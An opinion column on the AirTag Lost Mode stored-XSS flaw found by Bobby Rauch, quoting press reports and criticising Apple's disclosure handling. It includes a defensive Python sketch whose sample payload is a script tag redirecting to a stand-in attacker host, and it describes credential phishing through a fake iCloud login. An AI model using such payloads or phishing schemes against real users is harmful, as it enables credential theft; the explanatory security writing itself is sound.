One of the more frightening facts about mobile IT in 2021 is that simplicity and convenience are far too tempting in small devices (think Apple Watch, AirTags, even rings that track health conditions, smart headphones, etc.).
Compared with their laptop and desktop ancestors, they make it far more difficult to check that URLs are proper, that spam/malware texts/emails don’t get opened and that employees follow the minimal cybersecurity precautions IT asks. In short, as convenience ramps up, so do security risks. (Confession: Even though I try to be ultra-vigilant with desktop emails, I do periodically — far more often than I should — drop my guard on a message coming through my Apple Watch.)
Another of the always-has-been, always-will-be cybersecurity realities is that small programming errors are easy to make and often get overlooked. And yet, those small errors can lead to gargantuan security holes. This brings us to Apple and AirTags.
A security researcher has come to the CISO rescue and found that a free-form field for typing in a phone number has unintentionally turned AirTags into God’s gift to malware criminals.
Let’s turn to Ars Technica for details on the disaster.
“Security consultant and penetration tester Bobby Rauch discovered that Apple’s AirTags — tiny devices which can be affixed to frequently lost items like laptops, phones, or car keys — don’t sanitize user input. This oversight opens the door for AirTags to be used in a drop attack. Instead of seeding a target’s parking lot with USB drives loaded with malware, an attacker can drop a maliciously prepared AirTag,” the publication reported.
“This kind of attack doesn’t need much technological know-how — the attacker simply types valid XSS into the AirTag’s phone number field, then puts the AirTag in Lost mode and drops it somewhere the target is likely to find it. In theory, scanning a lost AirTag is a safe action — it’s only supposed to pop up a webpage at https://found.apple.com/. The problem is that found.apple.com then embeds the contents of the phone number field in the website as displayed on the victim’s browser, unsanitized.”
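The flaw Rauch describes is a classic stored-XSS pattern: a server echoes a user-supplied field into a webpage without escaping it. A minimal Python sketch (not Apple’s actual code — the function and payload here are hypothetical) shows why escaping the field neutralizes the injection:

```python
import html

def render_lost_page(phone: str, sanitize: bool = True) -> str:
    """Hypothetical server-side renderer for a 'lost item' page.
    Embedding the phone field raw reproduces the class of bug
    described above; html.escape() renders any markup inert."""
    field = html.escape(phone) if sanitize else phone
    return f"<p>Please call the owner at: {field}</p>"

# A "phone number" that is actually an XSS payload:
payload = "<script>window.location='https://badside.tld/page.html'</script>"

print(render_lost_page(payload, sanitize=False))  # live <script> tag: executes in a browser
print(render_lost_page(payload, sanitize=True))   # &lt;script&gt;...: displayed as inert text
```

The unsanitized version hands the attacker a script that runs in the finder’s browser under found.apple.com’s origin; the escaped version merely displays the payload as text.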
The worst part about this hole is that the damage it can inflict is limited only by the attacker’s creativity. Because an attacker can enter almost any URL into that field, coupled with the fact that victims are unlikely to bother meaningfully investigating what is happening, the bad options are all but limitless.
More from Ars Technica: “If found.apple.com innocently embeds the XSS above into the response for a scanned AirTag, the victim gets a popup window which displays the contents of badside.tld/page.html. This might be a zero-day exploit for the browser or simply a phishing dialog. Rauch hypothesizes a fake iCloud login dialog, which can be made to look just like the real thing — but which dumps the victim’s Apple credentials onto the attacker’s server instead,” the story said. “Although this is a compelling exploit, it’s by no means the only one available — just about anything you can do with a webpage is on the table. That ranges from simple phishing as seen in the above example to exposing the victim’s phone to a zero-day no-click browser vulnerability.”
Rauch posted far more details at Medium.
This is why the convenience of devices such as AirTags is dangerous. Their small size and single-function persona make them appear innocuous, which they absolutely are not. Any device that can communicate with anyone or anything at the device’s whim (and, yes, I am looking at you, IoT and IIoT door locks, lightbulbs, temperature sensors and the like) is a major threat. It’s a threat to consumers, but it is a far more dangerous threat to enterprise IT and security operations.
That’s because when employees and contractors (not to mention distributors, suppliers, partners and even large customers with network credentials) interact with these small devices, they tend to forget every cybersecurity training instruction. End-users who are vigilant about email on their desktop (which isn’t everyone, sad to say) will still drop the ball on ultra-convenient small devices, as would I. We shouldn’t, but we do.
And that “we shouldn’t” deserves more context. Some of these devices — AirTags and smartwatches included — make cybersecurity vigilance on the part of end users all but impossible. This AirTag nightmare is just another reminder of this fact.
KrebsOnSecurity delved into some of the more frightening elements of this AirTags issue.
“The AirTag’s Lost Mode lets users alert Apple when an AirTag is missing. Setting it to Lost Mode generates a unique URL at https://found.apple.com, and allows the user to enter a personal message and contact phone number. Anyone who finds the AirTag and scans it with an Apple or Android phone will immediately see that unique Apple URL with the owner’s message,” KrebsOnSecurity noted. “When scanned, an AirTag in Lost Mode will present a short message asking the finder to call the owner at their specified phone number. This information pops up without asking the finder to log in or provide any personal information. But your average Good Samaritan might not know this.”
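Escaping on output is one fix; the other is refusing bad input in the first place. Since the field is supposed to hold only a phone number, a strict allowlist check would reject markup outright. This is a sketch of the general technique — the regex and function name are my own, not anything Apple uses:

```python
import re

# Accept only characters that plausibly appear in a phone number:
# an optional leading "+", then digits, spaces, parentheses, dots and dashes.
PHONE_RE = re.compile(r"^\+?[0-9 ().-]{3,20}$")

def is_valid_phone(value: str) -> bool:
    """Allowlist validation: any input containing markup fails."""
    return bool(PHONE_RE.fullmatch(value))

print(is_valid_phone("+1 (212) 555-0187"))          # True
print(is_valid_phone("<script>alert(1)</script>"))  # False
```

Allowlisting what a field may contain, rather than trying to blocklist dangerous characters, is the standard defensive posture for single-purpose inputs like this one.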
That’s a fine explanation of the danger, but the more intriguing part is how lackadaisical Apple is being about this hole — a pattern I have seen repeatedly with Apple. The company says it cares, but its inaction says otherwise.
“Rauch contacted Apple about the bug on June 20, but, for three months, when he inquired about it, the company would say only that it was still investigating. Last Thursday, the company sent Rauch a follow-up email stating they planned to address the weakness in an upcoming update, and in the meantime would he mind not talking about it publicly?” KrebsOnSecurity reported. “Rauch said Apple never acknowledged basic questions he asked about the bug, such as if they had a timeline for fixing it, and if so whether they planned to credit him in the accompanying security advisory. Or whether his submission would qualify for Apple’s bug bounty program, which promises financial rewards of up to $1 million for security researchers who report security bugs in Apple products. Rauch said he’s reported many software vulnerabilities to other vendors over the years, and that Apple’s lack of communication prompted him to go public with his findings — even though Apple says staying quiet about a bug until it is fixed is how researchers qualify for recognition in security advisories.”
First, Rauch is absolutely correct here. When a vendor solicits security reports and then sits on them for months or longer, it harms its users and the industry. And by not quickly telling a researcher whether they will get paid, the vendor gives the researcher little choice but to alert the public.
At the very least, the vendor needs to be explicit and specific about when a patch will be rolled out. Here’s the kicker: If Apple can’t get to it for a while, it has an obligation to report the hole to potential victims so they can change their behavior to avoid it. Fixing the hole is obviously far better, but if Apple won’t do that quickly, it’s creating an untenable situation.
This is the age-old bug disclosure problem, a problem that these bounty programs were supposed to address. Pre-patch disclosure runs the risk of flagging the hole to cyberthieves, who might rush to take advantage of it. That said, some attackers may well already know of the hole. In that case, Apple’s inaction does nothing more than leave victims open to attack.
Apple’s behavior is infuriating. A bounty program that ties payment promises to requests for silence obligates the company to take both elements seriously. If Apple runs such a program and then takes far too long to do anything about these holes, it undermines the whole program, along with consumers and enterprises alike.